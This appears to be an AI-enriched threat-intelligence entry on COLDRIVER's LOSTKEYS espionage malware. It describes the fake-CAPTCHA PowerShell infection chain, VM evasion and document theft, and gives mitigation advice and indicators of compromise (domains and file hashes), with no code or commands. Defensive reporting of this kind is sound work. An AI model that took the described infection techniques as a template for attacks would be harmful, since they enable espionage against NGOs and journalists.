COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs
Russian government-backed threat group COLDRIVER has developed a new malware called LOSTKEYS, capable of stealing files and system information. The group targets high-profile individuals, NGOs, and former intelligence officers through credential phishing and malware delivery. LOSTKEYS is delivered through a multi-step infection chain, starting with a fake CAPTCHA and involving PowerShell commands. The malware evades detection in VMs and uses a substitution cipher for decoding. COLDRIVER's primary goal is intelligence collection for Russia's strategic interests, targeting Western governments, militaries, journalists, and Ukraine-related individuals. The group has been linked to hack-and-leak campaigns in the UK and against NGOs.
AI Analysis
Technical Summary
COLDRIVER is a Russian government-backed threat actor that has developed a new malware strain named LOSTKEYS, designed primarily for espionage and intelligence collection. LOSTKEYS targets Western governments, militaries, journalists, NGOs, and individuals connected to Ukraine, including former intelligence officers. The infection vector begins with credential phishing campaigns that lure victims into interacting with a fake CAPTCHA, initiating a multi-stage infection chain. This chain leverages PowerShell commands to deploy the malware payload. LOSTKEYS employs advanced evasion techniques such as detecting virtual machine environments to avoid sandbox analysis and uses a substitution cipher to decode its payload, complicating detection and analysis. The malware is capable of stealing documents and system information, facilitating the exfiltration of sensitive data. COLDRIVER’s operations have been linked to hack-and-leak campaigns in the UK and against NGOs, underscoring their focus on high-value intelligence targets. The malware’s tactics, techniques, and procedures (TTPs) include credential theft, document theft, use of PowerShell for execution, and network reconnaissance, aligning with MITRE ATT&CK techniques such as T1566 (Phishing), T1059.001 (PowerShell), T1005 (Data from Local System), and T1102 (Web Service). Despite the lack of known exploits in the wild, the threat is credible given the actor’s history and strategic targeting.
Potential Impact
For European organizations, especially governmental bodies, NGOs, and entities involved in Ukraine-related activities, the impact of LOSTKEYS can be significant. The theft of sensitive documents and credentials can lead to exposure of confidential information, undermining operational security and diplomatic efforts. Intelligence gathered through this malware could be used to influence political decisions, disrupt military operations, or damage reputations through subsequent leak campaigns. NGOs working on human rights or conflict zones may face operational setbacks and loss of donor trust if their data is compromised. The use of sophisticated evasion techniques increases the risk of prolonged undetected presence within networks, amplifying potential damage. Additionally, the targeting of former intelligence officers and journalists suggests a broad scope that could affect information dissemination and public awareness in Europe.
Mitigation Recommendations
European organizations should implement targeted defenses beyond generic advice. First, enhance phishing detection and user training focused on recognizing fake CAPTCHAs and suspicious credential requests. Deploy advanced endpoint detection and response (EDR) solutions capable of identifying PowerShell abuse and unusual script execution patterns. Network monitoring should include detection of anomalous web service communications indicative of data exfiltration (T1102). Employ sandbox environments that can bypass VM detection to analyze suspicious files. Enforce strict application whitelisting and PowerShell constrained language mode to limit unauthorized script execution. Regularly audit and restrict administrative privileges to reduce the impact of credential theft. Implement multi-factor authentication (MFA) to mitigate the risk of compromised credentials being used for lateral movement. Finally, share threat intelligence related to COLDRIVER and LOSTKEYS within European cybersecurity communities to improve collective defense.
Affected Countries
United Kingdom, Germany, France, Poland, Ukraine, Netherlands, Belgium, Sweden
Indicators of Compromise
- domain: cloudmediaportal.com
- domain: njala.dev
- hash: 09b740bb082b465fcc9f8a7766984317
- hash: 15ecd6b5a2df7ccabbab3cd3b42c443d
- hash: 688c01c49525df877d4bc28aa534d31d
- hash: 6d23b468ea963bfa21a29891217d6a86
- hash: aef72f5dcdf97aa2970a76ababe6b640
- hash: da8b74efc6f4ff7491829c6745da220c
- hash: de4bf7af4195667a6710f7ad56bf52c0
- hash: dee8d82d931f91d94086dc3d8e56394f
- hash: f91705e56983ba3c3cd940d62bc2ed35
- hash: 0ac32fd4e6ef96163084fdb09d05e1ae7124e6d9
- hash: 3c4a0f254b598c107c8b3375ab4cd5c9c7717587
- hash: 56b0d6d7fb81b77c0713361f0b95994d19414bf1
- hash: 94bfd6fba2dec53a4df9b815d1f7dc150b37d4af
- hash: a408c34b61d82b05838be1cc3862656db25a4cfe
- hash: bd907c2512facbeef31d4e683828dfece01849e2
- hash: de2e039c69f6f4f5af23d4eac2d3235e2ce4f20c
- hash: e7b6bfbfb6e496e57ceaba00fabe7df1d6b5061c
- hash: ff9824395c18e1cf70960862654eb0a8b012eeaa
- hash: 02ce477a07681ee1671c7164c9cc847b01c2e1cd50e709f7e861eaab89c69b6f
- hash: 13f7599c94b9d4b028ce02397717a1282a46f07b9d3e2f8f2b3213fa8884b029
- hash: 28a0596b9c62b7b7aca9cac2a07b067109f27d327581a60e8cb4fab92f8f4fa9
- hash: 3233668d2e4a80b17e6357177b53539df659e55e06ba49777d0d5171f27565dd
- hash: 4c7accba35edd646584bb5a40ab78f963de45e5fc816e62022cd7ab1b01dae9c
- hash: 6b85d707c23d68f9518e757cc97adb20adc8accb33d0d68faf1d8d56d7840816
- hash: 6bc411d562456079a8f1e38f3473c33ade73b08c7518861699e9863540b64f9a
- hash: 8af28bb7e8e2f663d4b797bf3ddbee7f0a33f637a33df9b31fbb4c1ce71b2fee
- hash: b55cdce773bc77ee46b503dbd9430828cc0f518b94289fbfa70b5fbb02ab1847
COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs
Description
Russian government-backed threat group COLDRIVER has developed a new malware called LOSTKEYS, capable of stealing files and system information. The group targets high-profile individuals, NGOs, and former intelligence officers through credential phishing and malware delivery. LOSTKEYS is delivered through a multi-step infection chain, starting with a fake CAPTCHA and involving PowerShell commands. The malware evades detection in VMs and uses a substitution cipher for decoding. COLDRIVER's primary goal is intelligence collection for Russia's strategic interests, targeting Western governments, militaries, journalists, and Ukraine-related individuals. The group has been linked to hack-and-leak campaigns in the UK and against NGOs.
AI-Powered Analysis
Technical Analysis
COLDRIVER is a Russian government-backed threat actor that has developed a new malware strain named LOSTKEYS, designed primarily for espionage and intelligence collection. LOSTKEYS targets Western governments, militaries, journalists, NGOs, and individuals connected to Ukraine, including former intelligence officers. The infection vector begins with credential phishing campaigns that lure victims into interacting with a fake CAPTCHA, initiating a multi-stage infection chain. This chain leverages PowerShell commands to deploy the malware payload. LOSTKEYS employs advanced evasion techniques such as detecting virtual machine environments to avoid sandbox analysis and uses a substitution cipher to decode its payload, complicating detection and analysis. The malware is capable of stealing documents and system information, facilitating the exfiltration of sensitive data. COLDRIVER’s operations have been linked to hack-and-leak campaigns in the UK and against NGOs, underscoring their focus on high-value intelligence targets. The malware’s tactics, techniques, and procedures (TTPs) include credential theft, document theft, use of PowerShell for execution, and network reconnaissance, aligning with MITRE ATT&CK techniques such as T1566 (Phishing), T1059.001 (PowerShell), T1005 (Data from Local System), and T1102 (Web Service). Despite the lack of known exploits in the wild, the threat is credible given the actor’s history and strategic targeting.
Potential Impact
For European organizations, especially governmental bodies, NGOs, and entities involved in Ukraine-related activities, the impact of LOSTKEYS can be significant. The theft of sensitive documents and credentials can lead to exposure of confidential information, undermining operational security and diplomatic efforts. Intelligence gathered through this malware could be used to influence political decisions, disrupt military operations, or damage reputations through subsequent leak campaigns. NGOs working on human rights or conflict zones may face operational setbacks and loss of donor trust if their data is compromised. The use of sophisticated evasion techniques increases the risk of prolonged undetected presence within networks, amplifying potential damage. Additionally, the targeting of former intelligence officers and journalists suggests a broad scope that could affect information dissemination and public awareness in Europe.
Mitigation Recommendations
European organizations should implement targeted defenses beyond generic advice. First, enhance phishing detection and user training focused on recognizing fake CAPTCHAs and suspicious credential requests. Deploy advanced endpoint detection and response (EDR) solutions capable of identifying PowerShell abuse and unusual script execution patterns. Network monitoring should include detection of anomalous web service communications indicative of data exfiltration (T1102). Employ sandbox environments that can bypass VM detection to analyze suspicious files. Enforce strict application whitelisting and PowerShell constrained language mode to limit unauthorized script execution. Regularly audit and restrict administrative privileges to reduce the impact of credential theft. Implement multi-factor authentication (MFA) to mitigate the risk of compromised credentials being used for lateral movement. Finally, share threat intelligence related to COLDRIVER and LOSTKEYS within European cybersecurity communities to improve collective defense.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos"]
- Adversary
- COLDRIVER
- Pulse Id
- 681ba0e01c36344c7ac60892
- Threat Score
- null
Indicators of Compromise
Domain
Value | Description | Copy |
---|---|---|
domaincloudmediaportal.com | — | |
domainnjala.dev | — |
Hash
Value | Description | Copy |
---|---|---|
hash09b740bb082b465fcc9f8a7766984317 | MD5 of e7b6bfbfb6e496e57ceaba00fabe7df1d6b5061c | |
hash15ecd6b5a2df7ccabbab3cd3b42c443d | MD5 of 94bfd6fba2dec53a4df9b815d1f7dc150b37d4af | |
hash688c01c49525df877d4bc28aa534d31d | MD5 of 0ac32fd4e6ef96163084fdb09d05e1ae7124e6d9 | |
hash6d23b468ea963bfa21a29891217d6a86 | — | |
hashaef72f5dcdf97aa2970a76ababe6b640 | MD5 of 56b0d6d7fb81b77c0713361f0b95994d19414bf1 | |
hashda8b74efc6f4ff7491829c6745da220c | MD5 of bd907c2512facbeef31d4e683828dfece01849e2 | |
hashde4bf7af4195667a6710f7ad56bf52c0 | MD5 of ff9824395c18e1cf70960862654eb0a8b012eeaa | |
hashdee8d82d931f91d94086dc3d8e56394f | — | |
hashf91705e56983ba3c3cd940d62bc2ed35 | MD5 of de2e039c69f6f4f5af23d4eac2d3235e2ce4f20c | |
hash0ac32fd4e6ef96163084fdb09d05e1ae7124e6d9 | — | |
hash3c4a0f254b598c107c8b3375ab4cd5c9c7717587 | — | |
hash56b0d6d7fb81b77c0713361f0b95994d19414bf1 | — | |
hash94bfd6fba2dec53a4df9b815d1f7dc150b37d4af | — | |
hasha408c34b61d82b05838be1cc3862656db25a4cfe | — | |
hashbd907c2512facbeef31d4e683828dfece01849e2 | — | |
hashde2e039c69f6f4f5af23d4eac2d3235e2ce4f20c | — | |
hashe7b6bfbfb6e496e57ceaba00fabe7df1d6b5061c | — | |
hashff9824395c18e1cf70960862654eb0a8b012eeaa | — | |
hash02ce477a07681ee1671c7164c9cc847b01c2e1cd50e709f7e861eaab89c69b6f | — | |
hash13f7599c94b9d4b028ce02397717a1282a46f07b9d3e2f8f2b3213fa8884b029 | SHA256 of ff9824395c18e1cf70960862654eb0a8b012eeaa | |
hash28a0596b9c62b7b7aca9cac2a07b067109f27d327581a60e8cb4fab92f8f4fa9 | SHA256 of de2e039c69f6f4f5af23d4eac2d3235e2ce4f20c | |
hash3233668d2e4a80b17e6357177b53539df659e55e06ba49777d0d5171f27565dd | SHA256 of bd907c2512facbeef31d4e683828dfece01849e2 | |
hash4c7accba35edd646584bb5a40ab78f963de45e5fc816e62022cd7ab1b01dae9c | SHA256 of 94bfd6fba2dec53a4df9b815d1f7dc150b37d4af | |
hash6b85d707c23d68f9518e757cc97adb20adc8accb33d0d68faf1d8d56d7840816 | SHA256 of e7b6bfbfb6e496e57ceaba00fabe7df1d6b5061c | |
hash6bc411d562456079a8f1e38f3473c33ade73b08c7518861699e9863540b64f9a | SHA256 of 0ac32fd4e6ef96163084fdb09d05e1ae7124e6d9 | |
hash8af28bb7e8e2f663d4b797bf3ddbee7f0a33f637a33df9b31fbb4c1ce71b2fee | SHA256 of 56b0d6d7fb81b77c0713361f0b95994d19414bf1 | |
hashb55cdce773bc77ee46b503dbd9430828cc0f518b94289fbfa70b5fbb02ab1847 | — |
Threat ID: 68421305182aa0cae2f2a22d
Added to database: 6/5/2025, 9:58:29 PM
Last enriched: 7/7/2025, 5:26:14 PM
Last updated: 8/14/2025, 11:27:23 PM
Views: 23
Related Threats
ThreatFox IOCs for 2025-08-16
MediumScammers Compromised by Own Malware, Expose $4.67M Operation and Identities
MediumThreatFox IOCs for 2025-08-15
MediumThreat Actor Profile: Interlock Ransomware
Medium'Blue Locker' Analysis: Ransomware Targeting Oil & Gas Sector in Pakistan
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.